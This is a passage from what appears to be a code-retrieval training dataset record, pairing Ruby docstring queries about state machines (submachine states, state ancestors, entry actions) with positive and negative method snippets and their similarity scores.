"def closed?\n state_name == \"closed\"\n end",
"def current_state?(state) \n\t return state == current_state.to_sym\n\tend",
"def state_name\n self.state.name if self.state\n end",
"def approved?\n state == 'approved'\n end",
"def primaryChange\n\t\treturn false if @frozen\n\t\tcase @state\n\t\twhen :white\n\t\t\t@state = :black\n\t\twhen :black\n\t\t\t@state = :white\n\t\tend\n\t\treturn true\n\tend",
"def state\n states.first\n end",
"def active?; status == :active; end",
"def state=(s)\n raise ArgumentError, 'The state of TurnOnTasks is always \\'ON\\'' unless s.casecmp('ON').zero?\n super\n end",
"def define_state_accessor; end",
"def state()\n info[:state]\n end"
] |
[
"0.6418176",
"0.62676144",
"0.6224467",
"0.6139125",
"0.6101698",
"0.60610384",
"0.60348487",
"0.5992234",
"0.5944982",
"0.5880808",
"0.58668256",
"0.58348817",
"0.58233947",
"0.5819948",
"0.5819948",
"0.5806888",
"0.57899964",
"0.57864094",
"0.57849985",
"0.5783942",
"0.5772183",
"0.5758649",
"0.57393026",
"0.572332",
"0.57224655",
"0.57183945",
"0.5708913",
"0.5706177",
"0.57026404",
"0.56960666",
"0.56960666",
"0.56960666",
"0.56960666",
"0.56960666",
"0.56960666",
"0.56960666",
"0.56960666",
"0.5682679",
"0.5677965",
"0.56770664",
"0.56723285",
"0.56528324",
"0.56473684",
"0.56387556",
"0.5637",
"0.5623821",
"0.5591193",
"0.5571721",
"0.55595",
"0.5557771",
"0.5543404",
"0.5524098",
"0.5521059",
"0.5521059",
"0.5519862",
"0.5512347",
"0.55036527",
"0.5491916",
"0.54885864",
"0.54885864",
"0.54885864",
"0.54794574",
"0.5472118",
"0.5471171",
"0.54641867",
"0.5461323",
"0.54600513",
"0.54476136",
"0.54392666",
"0.54371893",
"0.5423965",
"0.5404986",
"0.5400849",
"0.53965443",
"0.539283",
"0.53923315",
"0.539227",
"0.53888947",
"0.5382736",
"0.53638744",
"0.53631085",
"0.53624696",
"0.53622013",
"0.53622013",
"0.53622013",
"0.53622013",
"0.53622013",
"0.53622013",
"0.53563446",
"0.5353917",
"0.5351263",
"0.53497165",
"0.53489757",
"0.5341021",
"0.5340633",
"0.5337397",
"0.5331163",
"0.53303",
"0.5312236",
"0.5310436"
] |
0.5853322
|
11
|
A state with isSubmachineState=true is said to be a submachine state. Such a state refers to a state machine (submachine). Default value is false.
|
def isSubmachineState
! ! @submachine
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def state?(state)\n @_state == state\n end",
"def state?(state)\n @state == state\n end",
"def get_state\n return self.state == 't' || self.state == true\n end",
"def has_state?\n !!current_state\n end",
"def state?\n usa?\n end",
"def isComposite\n ! ! @submachine\n end",
"def is_state_machine(options = {}, &block)\n extend DataMapper::Is::StateMachine::EventDsl\n extend DataMapper::Is::StateMachine::StateDsl\n include DataMapper::Is::StateMachine::InstanceMethods\n\n # ===== Setup context =====\n options = { :column => :state, :initial => nil }.merge(options)\n column = options[:column]\n initial = options[:initial].to_s\n unless properties.detect { |p| p.name == column }\n property column, String, :default => initial\n end\n machine = Data::Machine.new(column, initial)\n @is_state_machine = { :machine => machine }\n\n # ===== Define callbacks =====\n # TODO: define callbacks\n # before :save do\n # if self.new_record?\n # # ...\n # else\n # # ...\n # end\n # end\n\n before :destroy do\n # Do we need to do anything here?\n end\n\n # ===== Setup context =====\n push_state_machine_context(:is)\n\n yield if block_given?\n\n # ===== Teardown context =====\n pop_state_machine_context\n end",
"def is_a_substate_of? x\n self.ancestors.include?(x)\n end",
"def has_state?\n !@states.empty?\n end",
"def is_state?(name)\n @state.include?(name)\n end",
"def manifestable_state?\n return true unless manages_state?\n workflow_class.manifest_states.include? Array.wrap(state).first.underscore\n end",
"def start_state?\n @state_type == :start\n end",
"def nested?\n !!state_or_event\n end",
"def state?(state)\n @states.key?(state)\n end",
"def current_state?(state) \n\t return state == current_state.to_sym\n\tend",
"def has_state?(v)\n @state[v]\n end",
"def has_state?(v)\n @state[v]\n end",
"def stateful?\n true\n end",
"def current_state?(state)\n state == current_state.to_sym\n end",
"def running?\n @state == :running\n end",
"def terminal_state?\n self.class.terminal_states.include?(@state)\n end",
"def define_state_predicate; end",
"def desired_state?\n return true unless options.key?(:desired_state)\n\n options[:desired_state]\n end",
"def define_state_predicate\n name = self.name\n \n # Still use class_eval here instance of define_instance_method since\n # we need to be able to call +super+\n @instance_helper_module.class_eval do\n define_method(\"#{name}?\") do |*args|\n args.empty? ? super(*args) : self.class.state_machine(name).states.matches?(self, *args)\n end\n end\n end",
"def has_state?(v)\n@state[v]\nend",
"def state_machine\n @state_machine ||= SubProjectMachine.new(self, {\n transition_class: ProjectTransition\n })\n end",
"def ark_mintable_state?\n return false unless manages_state?\n workflow_class.ark_mint_states.include? Array.wrap(state).first&.underscore\n end",
"def state_active?(state)\n @states[state][1]\n end",
"def running?; state == 'running'; end",
"def running?; state == 'running'; end",
"def state?(name)\n @states.include?(name.to_sym)\n end",
"def advanced_state?\n @advanced_state.present?\n end",
"def state?(type, name)\n @state.key?(make_key(type, name))\n end",
"def runtime_state?(sym); @runtime_states.include?(sym) end",
"def initialize_state?(object); end",
"def state_machine=(value)\n @state_machine = value.dup\n end",
"def state_machine=(value)\n @state_machine = value.dup\n end",
"def default_state_class?()\n \"SampleTransferPallet\"\n end",
"def running?\n (state == :running)\n end",
"def in_or_before_state?(test_state)\n return false if test_state.nil? || self.state.nil?\n test_state = test_state.to_sym\n my_state = self.state.to_sym\n\n # Get all the states that are in or before the state we want to check (test_state),\n # and then see if the vehicle's current state is in that list (well, technically in a lazy enumerable).\n Vehicle.aasm.states.reverse.lazy.drop_while { |state| state != test_state }.include?(my_state)\n end",
"def state_machine()\n parse_sucess = false\n if event_block && optional_reset_block()\n # if event_block() && optional_reset_block() &&\n # optional_command_block() && state_list()\n parse_sucess = true\n end\n parse_sucess\n end",
"def active?\n\t\t\tstate == 'active'\n\t\tend",
"def final_state?\n current_state == final_state\n end",
"def running?\n self.reload\n self.virtual_machine_state == \"RUNNING\"\n end",
"def verify_as_current_state?\n true\n end",
"def default_state_class?()\n return nil\n end",
"def end_state?\n @state_type == :end\n end",
"def active?\n @state.active?\n end",
"def in_or_after_state?(test_state)\n return false if test_state.nil? || self.state.nil?\n test_state = test_state.to_sym\n my_state = self.state.to_sym\n\n # Get all the states that are in and after the state we want to check (test_state),\n # and then see if the vehicle's current state is in that list (well, technically in a lazy enumerable).\n Vehicle.aasm.states.lazy.drop_while { |state| state != test_state }.include?(my_state)\n end",
"def define_state_method(state)\n return if machine.respond_to?(\"#{state}?\")\n machine.send(:define_singleton_method, \"#{state}?\") do\n machine.is?(state.to_sym)\n end\n end",
"def perform_initial_transition?\n !current_state\n end",
"def initial?\n Machine[@target_class].initial_state_name == self.name\n end",
"def public_readable_state?\n return true unless manages_state?\n workflow_class.public_read_states.include? Array.wrap(state).first.underscore\n end",
"def running?\n return false if state.nil?\n \"running\".casecmp(state).zero?\n end",
"def workflow_state\n return false unless @curation_concern.respond_to? :workflow_state\n @curation_concern.workflow_state\n end",
"def sub_branch?\n !root?\n end",
"def machine?\n machine_flag != '0'\n end",
"def has_lifecycle?\n false\n end",
"def current?\n [machine.current, ANY_STATE].any? { |state| state == from_state }\n end",
"def running?\n @state == :started\n end",
"def operational?\n state == 'operational'\n end",
"def closed?\n state_name == \"closed\"\n end",
"def running?\n update_state()\n return @society_state == RUNNING\n end",
"def state_guard?(state_id)\n return false\n end",
"def valid_state?(state_class)\n state_class.is_a?(Class) && state_class < State\n end",
"def has_state(name)\n !@_possible_states[name].nil?\n end",
"def state_machine\n @state_machine ||= self.class.instantiate_state_machine_template\n end",
"def isInTransition()\n\t\t\treturn @_state == nil\n\t\tend",
"def toggle_state\n state\n end",
"def in_state?(path)\n self.find_states(current_state.path).include? find_state(path)\n end",
"def waitingsecond?\n state_name == \"waitingsecond\"\n end",
"def options_changeable?\n network_state = @model_net_data.network_state\n if network_state == :state_on_localgame or\n network_state == :state_on_netgame\n return false\n else\n return true\n end\n end",
"def has_lifecycle?\n true\n end",
"def steady_state?(state)\n STATES[state] >= STEADY_STATE_THRESHOLD\n end",
"def new?\n @_state.nil?\n end",
"def is_transitioning?\n @is_transitioning\n end",
"def stopped?\n @state == :stopped\n end",
"def past_step_2?\n !spectator? && status_is_active?(\"events\")\n end",
"def running?\n return ![:deleted, :archived, :cancelled, :complete].include?(self.state)\n end",
"def for_startup?\n self.stage_id > 1\n end",
"def state\n s = self[:saved_state].to_sym\n if s == :running\n stop ? :cancelling : :running\n else\n s\n end\n end",
"def s\n @state_wrapper ||= EntwinedWrapperObject.new(@subgame_state.state, @subgame_state)\n end",
"def state_machine \r\n \r\n # Give the statemachine the statestore, its used in random walks etc\r\n @state_machine.adjacency_matrix=create_adjacency_matrix(@temp_transition_list)\r\n @state_machine.states_store=self.states_store\r\n\t\t@state_machine.guarded_actions=@guards\r\n return @state_machine\r\n end",
"def is_sub?\n @sub\n end",
"def child?\n false\n end",
"def running?\n @child && @child.running?\n end",
"def known_states; end",
"def known_states; end",
"def known_states; end",
"def transition?\n current.transition?\n end",
"def boolean!\n # -> uncomment the next line to manually enable rule tracing\n # trace_in( __method__, 16 )\n\n\n\n type = BOOLEAN\n channel = ANTLR3::DEFAULT_CHANNEL\n # - - - - label initialization - - - -\n\n\n # - - - - main rule block - - - -\n # at line 37:10: 'estado'\n match( \"estado\" )\n\n\n\n @state.type = type\n @state.channel = channel\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out( __method__, 16 )\n\n\n end",
"def enum?\n false\n end",
"def is_running?\n @running\n end",
"def has_bool_state\n params.require(:state)\n if ! params[:state].in? [\"true\", \"false\"]\n head :bad_request\n end\n params[:state] = ActiveModel::Type::Boolean.new.cast(params[:state])\n end",
"def enabled_state\n super\n end",
"def enabled_state\n super\n end",
"def enabled_state\n super\n end",
"def enabled_state\n super\n end",
"def enabled_state\n super\n end",
"def enabled_state\n super\n end"
] |
[
"0.6294503",
"0.6210016",
"0.6182318",
"0.6178241",
"0.61162686",
"0.61064464",
"0.6078177",
"0.6032297",
"0.60144484",
"0.60070306",
"0.59886426",
"0.5981271",
"0.59673",
"0.59620607",
"0.5946726",
"0.5945685",
"0.5945685",
"0.5914703",
"0.5874971",
"0.58738726",
"0.5859875",
"0.58317465",
"0.5816138",
"0.5780592",
"0.5747768",
"0.5731744",
"0.57257456",
"0.56285566",
"0.56231457",
"0.56231457",
"0.56231004",
"0.56108737",
"0.56098485",
"0.5593943",
"0.5562879",
"0.5547808",
"0.5547808",
"0.5543986",
"0.5542712",
"0.5538319",
"0.5534557",
"0.552645",
"0.55060893",
"0.54959923",
"0.5491851",
"0.5488221",
"0.5458683",
"0.5449889",
"0.54433495",
"0.54255193",
"0.5425508",
"0.54167116",
"0.54125094",
"0.5398592",
"0.5395449",
"0.53613186",
"0.5349323",
"0.5332282",
"0.5319171",
"0.5313964",
"0.53121954",
"0.5310757",
"0.52988684",
"0.5288508",
"0.5278177",
"0.52660334",
"0.52654594",
"0.5240478",
"0.5230656",
"0.5226096",
"0.52233636",
"0.52232206",
"0.52139896",
"0.5205715",
"0.52053285",
"0.52037835",
"0.51977307",
"0.51889753",
"0.51865023",
"0.5183354",
"0.51668656",
"0.51664454",
"0.5165775",
"0.516367",
"0.51559865",
"0.51503253",
"0.51472443",
"0.51472443",
"0.51472443",
"0.5140226",
"0.51397586",
"0.5135055",
"0.5131617",
"0.5131329",
"0.51191604",
"0.51191604",
"0.51191604",
"0.51191604",
"0.51191604",
"0.51191604"
] |
0.8428747
|
0
|
Returns a NamedArray of all ancestor States. self is the first element.
|
def ancestors
@ancestors ||=
begin
x = [ self ]
if ss = superstate
x.push(*ss.ancestors)
end
NamedArray.new(x.freeze, :state)
end
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def ancestors\n []\n end",
"def all_active_states\n return [] unless __is_current__?\n return [self] if @substates.empty?\n\n @substates.reduce([]) do |arr, substate|\n arr.concat(substate.all_active_states) if substate.__is_current__? # concat mutates ;)\n arr\n end\n end",
"def ancestors\n []\n end",
"def ancestors\n ancestors = []\n current_ancestor = self\n \n while !current_ancestor.nil?\n \n if current_ancestor.respond_to?(:parent)\n ancestors << current_ancestor\n current_ancestor = current_ancestor.parent\n else\n current_ancestor = nil\n end\n \n end\n \n ancestors\n end",
"def ancestors\n parents = []\n\n this_parent = self.parent\n\n while this_parent != nil\n parents << this_parent\n this_parent = this_parent.parent\n end\n parents\n end",
"def states\n @finity.states.map { |name, _| name }\n end",
"def ancestors\n itr = self\n res = []\n until itr.top_level?\n itr = itr.parents.first\n res << itr\n end\n res\n end",
"def ancestors\n @ancestors ||= [self] + (self.parent.try(:ancestors) || [])\n end",
"def ancestors\n @ancestors ||= parent ? parent.ancestors + [parent] : []\n end",
"def ancestors\n if parent.nil?\n []\n else\n parent.ancestors + [parent]\n end\n end",
"def ancestors\n parent ? [parent, *parent.ancestors].reverse : []\n end",
"def ancestors\n parents + parents.map(&:ancestors).flatten\n end",
"def ancestors\n node_ancestors.map(&:ancestor)\n end",
"def ancestors\n parent ? [parent, parent.ancestors].flatten : []\n end",
"def ancestors\n node, nodes = self, []\n nodes << node = node.parent while node.parent\n nodes\n end",
"def to_a\n @_states.values\n end",
"def ancestors\n return [] if root?\n tree_search_class.find(self[tree_path_field])\n end",
"def ancestors\n \tif parent_name.blank?\n\t \tancestors = [] \n \telse\n \t\tp = Category.where(name: parent_name).first\n \t\tancestors = p.ancestors\n \t\tancestors << parent_name\n \tend\n \tancestors\n end",
"def states\r\n return @states.uniq\r\n end",
"def self_and_ancestors\n \t\tres = [self] + self.ancestors\n \t\treturn res.uniq\n \tend",
"def ancestors\n node, nodes = self, []\n nodes << node = node.parent while node.parent\n nodes\n end",
"def ancestors\n node, nodes = self, []\n nodes << node = node.parent while node.parent\n nodes\n end",
"def ancestors\n self_and_ancestors - [self]\n end",
"def ancestors; end",
"def ancestors; end",
"def ancestors; end",
"def ancestors; end",
"def ancestors \n \t\tres=parents\n \t\tparents.each {|c| res += c.ancestors}\n \t\treturn res.uniq\n \tend",
"def ancestors(scope = {})\n self_and_ancestors(scope) - [self]\n end",
"def ancestors() end",
"def matching_ancestors\n []\n end",
"def ancestors\n node, nodes = self, []\n nodes << node = node.parent while node.parent\n nodes\n end",
"def ancestors\n node, nodes = self, []\n nodes << node = node.parent while node.parent\n nodes\n end",
"def ancestors\n self.class.ancestors_of(self)\n end",
"def ancestor_ids\n read_attribute(self.base_class.ancestry_column).to_s.split(%r|[,/]|).uniq.map { |id| cast_primary_key(id) }\n end",
"def ancestors\n end",
"def ancestors\n model_base_class.scoped(:conditions => ancestor_conditions, :order => :ancestry_string)\n end",
"def ancestors\n @cache[:ancestors]\n end",
"def ancestors\n self.root? ? [] : self.parent.ancestors_and_self\n end",
"def all_ancestor_ids\n ancestors.pluck(:id)\n end",
"def states\n []\n end",
"def states\n []\n end",
"def to_array\n parents = []\n\n top_array = [self]\n c_arr = top_array\n\n self.class.base_class.each_with_level(descendants.includes(:link => :linkable)) do |menu, level|\n case level <=> parents.count\n when 0 # same level\n # set current array as new sibling array containing menu\n c_arr = [menu] \n\n # and push current array (the new sibling array) to current parent\n parents.last[1] << c_arr \n\n when 1 # descend\n # push a child array if the current level does no thave one\n c_arr << [] if c_arr.length == 1\n \n # and push the sibling array into that array\n c_arr[1] << [menu]\n\n # push the current array to be the current parent\n parents << c_arr\n\n # and reset the current as the new child array\n c_arr = c_arr[1].last\n\n when -1 # ascend\n # pop parents up to the parent of the new menu\n parents.pop while parents.count > level\n\n # and proceed to add new sibling as though level had been 0\n c_arr = [menu]\n parents.last[1] << c_arr\n end\n end\n\n top_array\n end",
"def ancestors_r(*args)\n # fetch all parents\n pending = [self]\n ans = []\n while !pending.empty?\n e = pending.pop\n e.parents(*args).each do |p|\n if !ans.include?(p)\n ans << p\n pending.push(p)\n end\n end\n end\n ans\n end",
"def branches\n if ancestor_ids.empty? then\n nil\n else\n read_attribute(self.base_class.ancestry_column).to_s.split(',')\n end\n end",
"def all_ancestors(ancestors=[])\n # Assumes only one parent\n result = []\n c = self\n while c && c.parent_groups\n result += c.parent_groups\n c = c.parent_groups[0]\n end\n result\n end",
"def ancestors_ids\n node, nodes = self, []\n while node.parent\n node = node.parent\n nodes << node.id\n end\n nodes\n end",
"def taxons_with_ancestors\n taxons.flat_map(&:breadcrumb_trail)\n end",
"def ancestors\n (parent ? parent.ancestors : []) << self\n end",
"def ancestors_of klass\n ancestors = []\n unexamined = [klass]\n seen = []\n loop do\n break if unexamined.empty?\n current = unexamined.shift\n seen << current\n stores = classes[current]\n break unless stores and not stores.empty?\n klasses = stores.map do |store|\n store.ancestors[current]\n end.flatten.uniq\n klasses = klasses - seen\n ancestors.push(*klasses)\n unexamined.push(*klasses)\n end\n ancestors.reverse\n end",
"def states; @_hegemon_states.keys; end",
"def ancestors\n model_base_class.where(ancestor_conditions).order(:materialized_path)\n end",
"def ancestors_of klass\n ancestors = []\n\n unexamined = [klass]\n seen = []\n\n loop do\n break if unexamined.empty?\n current = unexamined.shift\n seen << current\n\n stores = classes[current]\n\n next unless stores and not stores.empty?\n\n klasses = stores.flat_map do |store|\n store.ancestors[current] || []\n end.uniq\n\n klasses = klasses - seen\n\n ancestors.concat klasses\n unexamined.concat klasses\n end\n\n ancestors.reverse\n end",
"def states\r\n @states.collect {|id| $data_states[id] }\r\n end",
"def path_states\n @__cache__[:path] ||= @superstate ? [*@superstate.path_states, self] : [self] # recursion\n end",
"def all_children(scope = {})\n full_set(scope) - [self]\n end",
"def all_active_paths\n all_active_states.map(&:path)\n end",
"def self_and_ancestors\n ancestors + [self]\n end",
"def ancestors\n @space.ancestors\n end",
"def ancestors\n return @ancestors unless @ancestors.nil?\n # Stop if this is already the root node\n return @ancestors = [self] if File.basename(tree).empty?\n # Path for parent is blank if parent is root node\n parent_path = if File.dirname(tree) == '.'\n \"\"\n # Otherwise it is the directory in which this node is located\n else\n File.dirname tree\n end\n parent = git_flow_repo.working_file parent_path\n @ancestors = parent.ancestors + [ self ]\n end",
"def graph_states\n self.graph.states\n end",
"def get_children_array\n\t\t\tarr = []\n\t\t\tself.children.get_active.each do |child_1|\n\t\t\t\tarr << {menu: child_1, class: 'parent'}\n\t\t\t\tchild_1.children.get_active.each do |child_2|\n\t\t\t\t\tarr << {menu: child_2, class: 'child'}\n\t\t\t\tend\n\t\t\tend\n\t\t\tarr\n\t\tend",
"def ancestors\n if @hash.values.include? :null\n s = []\n build_hash = proc do |attributes, current_hypothesis|\n if attributes.empty?\n s << self.class.new(Hash[*current_hypothesis])\n else\n attributes[0].each do |value|\n build_hash[attributes[1..attributes.length], current_hypothesis + value]\n end\n end\n end\n build_hash[attributes.map { |key, values| values.map { |value| [key, value] } }, []]\n return s\n else\n @hash.select { |attr, value| value != :undefined }.map do |attr, value|\n self.class.new(@hash.merge({ attr => :undefined }))\n end\n end\n end",
"def states\n @states ||= {}\n end",
"def all_state_keys\r\n @state_keys.keys\r\n end",
"def all_in_tree\n accounts = Array.new\n accounts += ancestors\n accounts += sibling_accounts\n accounts += children\n accounts << self\n return accounts\n end",
"def ancestors\n without_self self_and_ancestors\n end",
"def ancestors_for(namespace)\n ancestors = []\n current = namespace\n\n while current&.parent_id\n # We're using find_by(id: ...) here to deal with cases where the\n # parent_id may point to a missing row.\n current = Namespace.unscoped.select([:id, :parent_id])\n .find_by(id: current.parent_id)\n\n ancestors << current.id if current\n end\n\n ancestors\n end",
"def ancestors(options={})\n @ancestors ||= begin\n return [] if top_level?\n objects = self.class.ancestors_of(self).scoped(options).group_by(&:id)\n index_path.map { |id| objects[id].first }\n end\n end",
"def self_and_ancestors\n ancestors + [self]\n end",
"def known_states\n branch.known_states\n end",
"def netzke_ancestors\n if self == Netzke::Base\n []\n else\n superclass.netzke_ancestors + [self]\n end\n end",
"def state_keys\n @state.keys\n end",
"def ancestors(options={})\n return [] if top_level?\n objects = self.class.ancestors_of(self).scoped(options).group_by(&:id)\n index_path.map { |id| objects[id].first }\n end",
"def each_ancestor # :nodoc:\n end",
"def descendents\n respond_to?(:values) ? values.map { |d| d.branch }.flatten : []\n end",
"def states\n states = Set.new([@initial_state])\n @transitions.each { |k,v| states += v.values }\n states\n end",
"def event_names\n @event_names ||= @states.collect do |_, state|\n state.events.keys\n end.flatten.uniq\n end",
"def each_ancestor\n ancestors = [self]\n while not ancestors.last.parent.nil?\n ancestors << ancestors.last.parent\n end\n ancestors.reverse_each { |a| yield a }\n end",
"def ancestry_setup\n ancestors.map { |suite| suite.setup }.flatten.reverse\n end",
"def hierarchy\n p = self\n h = []\n while(p.parent != nil)\n h = [p] + h\n p = p.parent\n end\n h = [p] + h\n \n h\n end",
"def children_names; @children.keys; end",
"def branches\n if ancestor_ids.empty? then\n nil\n else\n read_attribute(self.base_class.structure_column).to_s.split(',')\n end\n end",
"def available_states # :nodoc:\n if @states\n return @states\n end\n end",
"def ancestors(labels=[])\n ancs = []\n if primary_label and !labels.include?(primary_label.id)\n ancs << primary_label\n ancs = primary_label.ancestors(labels << primary_label.id) + ancs\n end\n ancs\n end",
"def ancestors\n records = self_and_ancestors - [self]\n\n scope = self_and_ancestors.where(arel[:id].not_eq(id))\n scope.records(records)\n end",
"def to_array\n children.each_with_object( [ self ] ) { |child, memo|\n memo.concat( child.to_array )\n }.flatten\n end",
"def hierarchy\n parents = []\n parent = self.parent\n\n while parent && !parent.parent_id.nil?\n parents << parent\n parent = parent.parent\n end\n\n return parents.reverse\n end",
"def full_hierarchy\n hierarchy = []\n current_location = self\n hierarchy << current_location.name\n while(1)\n if (current_location.location)\n location = current_location.location\n hierarchy << location.name\n current_location = location\n else\n break\n end\n end\n hierarchy.reverse.map {|h| h}.join(\", \")\n end",
"def all\n # return an array of all the regions\n return NAMES\n end",
"def ancestors(child_flow = self)\n parents = []\n parents << child_flow\n parents << child_flow.parent_steps.map { |s| ancestors(s.flow) } if child_flow.parent_steps.present?\n parents.flatten.uniq\n end",
"def all_groups\n result = Array.new\n \n for group in self.groups\n result << group.ancestors_and_self\n end\n \n result.flatten!\n result.uniq!\n \n return result\n end",
"def us_states\n response = get('AllUSStates')\n StoreStatesSerializer.new([]).from_xml(response) #.map(&:state)\n end",
"def ancestor_types\n self[\"ancestors\"].collect { |hash| hash[\":type\"].split(\"+\").first.split(\"/\", 2).last }\n end",
"def parents\n if parent.nil?\n [self]\n else\n parent.parents + [self]\n end\n end",
"def generate_ancestor_list(c)\n c.ancestors.find_all { |a| a != c }\n end",
"def get_state\n@state.keys\nend",
"def ancestor_map ignore=[]\n \t\tif ignore.include? self\n\t\t\tif next_etymon.present? && !(ignore.include?(next_etymon))\n\t\t\t\treturn [ { self => {} }, next_etymon.ancestor_map(ignore) ]\n\t\t\telse\n\t\t\t\treturn { self => {} } \n\t\t\tend\n \t\tend\n \n ignore << self\n parent_etym = primary_parent\n \n selfmap = parent_etym ? { self => parent_etym.ancestor_map(ignore) } : { self => {} }\n next_etymon ? [selfmap, next_etymon.ancestor_map(ignore)] : selfmap\n end",
"def self_and_parent_menus(options={})\n\t\t\tarr = [self]\n\t\t\tfather = self.parent\n\t\t\twhile father.present?\n\t\t\t\tarr << father\n\t\t\t\tfather = father.parent\n\t\t\tend\n\n\t\t\treturn arr.reverse\n\t\tend",
"def all_parents\n parents(all: true)\n end"
] |
[
"0.7137159",
"0.70319986",
"0.68577975",
"0.67584234",
"0.67583287",
"0.66906005",
"0.6610407",
"0.65746146",
"0.6526029",
"0.65129197",
"0.6512119",
"0.648894",
"0.6464761",
"0.6456015",
"0.6425596",
"0.64116263",
"0.6409109",
"0.6406646",
"0.6396961",
"0.6374533",
"0.63512427",
"0.63512427",
"0.63308024",
"0.6307654",
"0.6307654",
"0.6307654",
"0.6307654",
"0.63038445",
"0.62866336",
"0.6262321",
"0.62340367",
"0.62259376",
"0.62259376",
"0.62114435",
"0.6198317",
"0.61856943",
"0.6168313",
"0.6150256",
"0.61490595",
"0.61372566",
"0.61158305",
"0.61158305",
"0.6080731",
"0.60699445",
"0.6057343",
"0.6011861",
"0.601136",
"0.6010184",
"0.5977391",
"0.59728897",
"0.5964073",
"0.59627247",
"0.594927",
"0.59372884",
"0.5906197",
"0.5905818",
"0.59002334",
"0.58937997",
"0.58778346",
"0.58778065",
"0.58663696",
"0.5865551",
"0.5855935",
"0.58429253",
"0.58415747",
"0.5827808",
"0.5792701",
"0.5782931",
"0.5782248",
"0.57698727",
"0.5763513",
"0.57589453",
"0.5751922",
"0.57494015",
"0.57315135",
"0.5730504",
"0.571142",
"0.570653",
"0.56948614",
"0.56898576",
"0.5684307",
"0.56800973",
"0.567509",
"0.56437314",
"0.5635178",
"0.5630173",
"0.5626893",
"0.5617895",
"0.5616402",
"0.5607729",
"0.56048495",
"0.5604666",
"0.5601132",
"0.559852",
"0.55929065",
"0.55928975",
"0.5582717",
"0.5572766",
"0.5563409",
"0.5562928"
] |
0.80961573
|
0
|
Called by Machine when State is entered.
|
def entry! machine, args
_behavior! :entry, machine, args
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def enter_state\n end",
"def pre_enter(state_manager, game)\n # puts \"State : #{self.class}\"\n @exiting = false\n end",
"def enter!\n @state_machine.current_state = self\n\n @entry_actions.each do |entry_action|\n entry_action.call(@state_machine)\n end\n @transition_map.each do |type, events_to_transition_arrays|\n events_to_transition_arrays.each do |event, transitions|\n transitions.each(&:arm)\n end\n end\n end",
"def enter(state_manager, game)\n end",
"def enter_state\n puts \"Entering #{self.class}\"\n execution_state = EXECUTION_STATE[:active]\n end",
"def on_enter\n end",
"def trigger!\n\treturn if (@next_state_name == nil)\n\n\tcurrent_state = nil\n current_state = @states.fetch(@current_state_name) unless @current_state_name.nil?\n\n\tnext_state = @states.fetch(@next_state_name)\n next_state_name = @next_state_name\n\n\t@next_state_name = nil\n\n\tcurrent_state.atexit if(current_state.respond_to?(:atexit))\n\t@current_state_name = next_state_name\n\tnext_state.atentry if(next_state.respond_to?(:atentry))\n end",
"def on_state_begin(state_id)\n end",
"def state\n end",
"def state_changed\n @state_condition.signal @state\n end",
"def state; end",
"def state; end",
"def state; end",
"def state; end",
"def state; end",
"def state; end",
"def state; end",
"def state; end",
"def on_enter\n @state = :HIGHLIGHTED # duplicating since often these are inside containers\n @focussed = true\n if @handler && @handler.has_key?(:ENTER)\n fire_handler :ENTER, self\n end\n end",
"def on_enter\n raise \"Cannot enter Label\"\n end",
"def on_state(state, &block)\n end",
"def on_enter\n ## Form has already set this, and set modified to false\n @state = :HIGHLIGHTED # duplicating since often these are inside containers\n #@focussed = true\n if @handler && @handler.has_key?(:ENTER)\n fire_handler :ENTER, self\n end\n end",
"def update_state\n raise \"Nothing to do\"\n end",
"def set_State(value)\n set_input(\"State\", value)\n end",
"def set_State(value)\n set_input(\"State\", value)\n end",
"def enter\n puts \"CUSTOMER HAS ENTERED, LOCK GATE AGAIN\"\n @gate.change_state(ClosedGateState.new(@gate))\n end",
"def state_machine()\n parse_sucess = false\n if event_block && optional_reset_block()\n # if event_block() && optional_reset_block() &&\n # optional_command_block() && state_list()\n parse_sucess = true\n end\n parse_sucess\n end",
"def set_State(value)\n set_input(\"State\", value)\n end",
"def set_State(value)\n set_input(\"State\", value)\n end",
"def set_State(value)\n set_input(\"State\", value)\n end",
"def set_State(value)\n set_input(\"State\", value)\n end",
"def set_State(value)\n set_input(\"State\", value)\n end",
"def set_State(value)\n set_input(\"State\", value)\n end",
"def set_State(value)\n set_input(\"State\", value)\n end",
"def before_state(state)\n end",
"def game_state\n end",
"def set_State(value)\n set_input(\"State\", value)\n end",
"def set_State(value)\n set_input(\"State\", value)\n end",
"def set_State(value)\n set_input(\"State\", value)\n end",
"def set_State(value)\n set_input(\"State\", value)\n end",
"def set_State(value)\n set_input(\"State\", value)\n end",
"def set_State(value)\n set_input(\"State\", value)\n end",
"def set_State(value)\n set_input(\"State\", value)\n end",
"def states; end",
"def after_state(state)\n end",
"def start\n @state_machine.startup\n end",
"def on_entry(in_state: nil, &block)\n end",
"def exit_state\n end",
"def setup_state_machine\n @line_number = 1\n reset_reading\n end",
"def on_state_timeup(state_id)\n end",
"def execState\n findNextState\n current_state = @state_list[@state][@transition]\n\n @transition = eval \"#{@state}\"\n @history.push @state\n\n @finished = @state == :finish\n end",
"def fire_state_changed\n @sce = ChangeEvent.new(self) if @sce.nil?\n fire_handler :STATE_CHANGE, @sce\n end",
"def init_state_handler\n set_state_handler(:start)\n set_state_handler(:change)\n set_state_handler(:player)\n set_state_handler(:enemy)\n set_state_handler(:friend)\n set_state_handler(:over)\n end",
"def live\r\n @state=1\r\n end",
"def on_leave\n @_entered = false\n super\n end",
"def state\n @state\n end",
"def enter_pending; end",
"def run\n @state.run(self)\n end",
"def state_added! statemachine\n transitions_changed!\n end",
"def state\n @state\n end",
"def state\n @state\n end",
"def on_enter\n # if BTAB, the last comp XXX they must be focusable FIXME\n if $current_key == KEY_BTAB || $current_key == KEY_UP\n @current_component = @focusables.last\n elsif $current_key == KEY_TAB || $current_key == KEY_DOWN\n @current_component = @focusables.first\n else\n # let current component be, since an unhandled key may have resulted\n # in on_enter being called again\n end\n return unless @current_component\n $log.debug \" STACKFLOW came to ON_ENTER #{@current_component} \"\n set_form_row\n @_entered = true\n end",
"def state_code\n end",
"def jump_to_state(state)\n logger.debug \"STATE JUMP! to #{state}\"\n \n render_state(state)\n end",
"def finalize\r\n push_game_state(Main) # switch to game state \"Menu\"\r\nend",
"def initialize\n @state = :new\n end",
"def state_code\n end",
